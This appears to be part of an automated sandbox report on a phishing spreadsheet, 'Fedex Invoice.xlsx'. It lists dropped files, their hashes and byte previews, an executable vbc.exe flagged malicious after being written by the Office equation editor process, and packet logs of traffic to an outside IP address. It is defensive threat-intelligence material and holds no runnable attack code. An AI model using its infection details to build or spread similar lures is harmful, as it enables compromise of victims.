        SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
        Malicious:false
        Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A84E7AC2.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
        Category:dropped
        Size (bytes):85020
        Entropy (8bit):7.2472785111025875
        Encrypted:false
        SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
        MD5:738BDB90A9D8929A5FB2D06775F3336F
        SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
        SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
        SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
        Malicious:false
        Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BD1CC9A1.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
        Category:dropped
        Size (bytes):49744
        Entropy (8bit):7.99056926749243
        Encrypted:true
        SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
        MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
        SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
        SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
        SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
        Malicious:false
        Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C2C85D57.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):33795
        Entropy (8bit):7.909466841535462
        Encrypted:false
        SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
        MD5:613C306C3CC7C3367595D71BEECD5DE4
        SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
        SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
        SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
        Malicious:false
        Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C385632E.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):6815
        Entropy (8bit):7.871668067811304
        Encrypted:false
        SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
        MD5:E2267BEF7933F02C009EAEFC464EB83D
        SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
        SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
        SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
        Malicious:false
        Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBE0C5C8.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
        Category:dropped
        Size (bytes):14198
        Entropy (8bit):7.916688725116637
        Encrypted:false
        SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
        MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
        SHA1:72CA86D260330FC32246D28349C07933E427065D
        SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
        SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
        Malicious:false
        Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CDD787DB.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
        Category:dropped
        Size (bytes):8815
        Entropy (8bit):7.944898651451431
        Encrypted:false
        SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
        MD5:F06432656347B7042C803FE58F4043E1
        SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
        SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
        SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
        Malicious:false
        Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3F2487D.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):84203
        Entropy (8bit):7.979766688932294
        Encrypted:false
        SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
        MD5:208FD40D2F72D9AED77A86A44782E9E2
        SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
        SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
        SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
        Malicious:false
        Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D6DC676C.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
        Category:dropped
        Size (bytes):7006
        Entropy (8bit):7.000232770071406
        Encrypted:false
        SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
        MD5:971312D4A6C9BE9B496160215FE59C19
        SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
        SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
        SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
        Malicious:false
        Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB6B38D.emf
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):7788
        Entropy (8bit):5.545721180717153
        Encrypted:false
        SSDEEP:96:wl9nCblJaXn/08zDefAm/luoOHo6MiDbDda91RjTBbPxmPAWmOHX:wlgTNAK4oOIGbK1RvVwPAWmOHX
        MD5:BB62EE5F443BE2B2F4A6F0E9EC912168
        SHA1:0D21B1AE8F63B685973BB4AAE35D2AED0C83EA7A
        SHA-256:4EDC5BF1DE52C07FA92BEBF60D08ACD4E9D05F7022D19FB5E30A8D67F0C16C5B
        SHA-512:5FA3208CAD6032E161760DB40702CA1853BB32B911781FA0A47D0154B48B7AF7BCA3A0F7466C11E9E5F9B241A754A094B32B2E2662A95D1CBD0255F633AF8DA7
        Malicious:false
        Preview: ....l...).......u...<.........../....... EMF....l...........................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................{.6.).X...H...d.............................p....\...............l.....p........<5.u..p....`.p.){.$y.w..W...$.....(......w..W.$.......d............^.p.....^.p..W...W.H.M...$.-...T....<.w................<.9u.Z.v....X..n.....){........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.
        C:\Users\user\Desktop\~$Fedex Invoice.xlsx
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):330
        Entropy (8bit):1.4377382811115937
        Encrypted:false
        SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
        MD5:96114D75E30EBD26B572C1FC83D1D02E
        SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
        SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
        SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
        Malicious:true
        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        C:\Users\Public\vbc.exe
        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):135168
        Entropy (8bit):6.633797451082329
        Encrypted:false
        SSDEEP:1536:A8N0//nCe6zBm5+JqYnViL7yQMLIn6Otq/CrAvI70qBGqdFafRo6DomgJ:TaCeWBJdVc/MLo6Ot57HdFaf5oj
        MD5:ED004FE1AA9F4FA169A05B6716C03484
        SHA1:59AF725F7F1D9582674A0236F4E41B76BBA99D83
        SHA-256:ACE5D939D3258882A6D2E2431A690EE9ED410432BFA537465A2DD9DA92441F74
        SHA-512:B52579B5A47391863BD9CD5052375C3FEFE2A104D058929A3911D552E1BF0D4EC0C30C73469713F1B0852771FCB3C206F486C06AAC4C15E561C552FD333C193E
        Malicious:true
        Antivirus:
        • Antivirus: Joe Sandbox ML, Detection: 100%
        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6..W..W..W..K..W..u..W..q..W.Rich.W.........................PE..L.....VV............................p.............@..........................P..............................................$...(.......";..................................................................8... .......$............................text............................... ..`.data...dE..........................@....rsrc...";.......@..................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................

        Static File Info

        General

        File type:CDFV2 Encrypted
        Entropy (8bit):7.9881378434771335
        TrID:
        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
        File name:Fedex Invoice.xlsx
        File size:611032
        MD5:ec7f52b07d135f71c63fd20054a89646
        SHA1:c89fa952eaef37a4ad0a120fa2c998cd989bbf62
        SHA256:150f45aec13d1ab1c92977d65ca5e88fd84aaba570446006265afdbcb85d03a6
        SHA512:9ec0b0a89afe4b685e5aa6ae3e0c1d861ca84f6c31aee88c0ded285fb1b7d31a74259090bdd18036cfb832ccc74a7b36815a25e0294d6d9bf566d794fb24134e
        SSDEEP:12288:NLW1VYUxaXgVhBLvyO60L3g5lA/UeQQMPSv3QphFG93f:NLW1V/xugVhBLvyOSleePSIU3f
        File Content Preview:........................>.......................................................................................y..............................................................................................................................................

        File Icon

        Icon Hash:e4e2aa8aa4b4bcb4

        Network Behavior

        TCP Packets

        Timestamp                               Source Port  Dest Port  Source IP       Dest IP
        Sep 14, 2021 21:51:37.408901930 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.437874079 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.438127041 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.438657045 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.473706961 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.473750114 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.473776102 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.473799944 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.473925114 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.505139112 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.505177975 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.505202055 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.505218983 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.505224943 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.505240917 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.505244970 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.505254984 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.505264997 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.505284071 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.505297899 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.505306959 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.505328894 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.505332947 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.505342960 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.505373955 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.538853884 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.538897038 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.538923025 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.538944960 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.538969040 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.538985014 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.539002895 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.539009094 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.539021015 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.539028883 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.539041042 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.539057970 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.539078951 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.539083958 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.539096117 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.539109945 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.539130926 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.539149046 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.539165974 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.539181948 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.539223909 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.539238930 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.541033030 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.567837954 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.567939997 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.568125010 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568146944 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568167925 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568181038 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.568181992 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568196058 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568208933 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568222046 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568233013 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568247080 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568263054 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568269014 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.568280935 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568289995 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.568296909 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568311930 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568317890 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.568327904 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568336010 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.568344116 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568356991 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.568363905 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568377018 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.568382978 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568397999 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568398952 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.568414927 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568418980 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.568430901 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568438053 CEST    49165        80         192.168.2.22    212.192.246.25
        Sep 14, 2021 21:51:37.568447113 CEST    80           49165      212.192.246.25  192.168.2.22
        Sep 14, 2021 21:51:37.568460941 CEST    49165        80         192.168.2.22    212.192.246.25
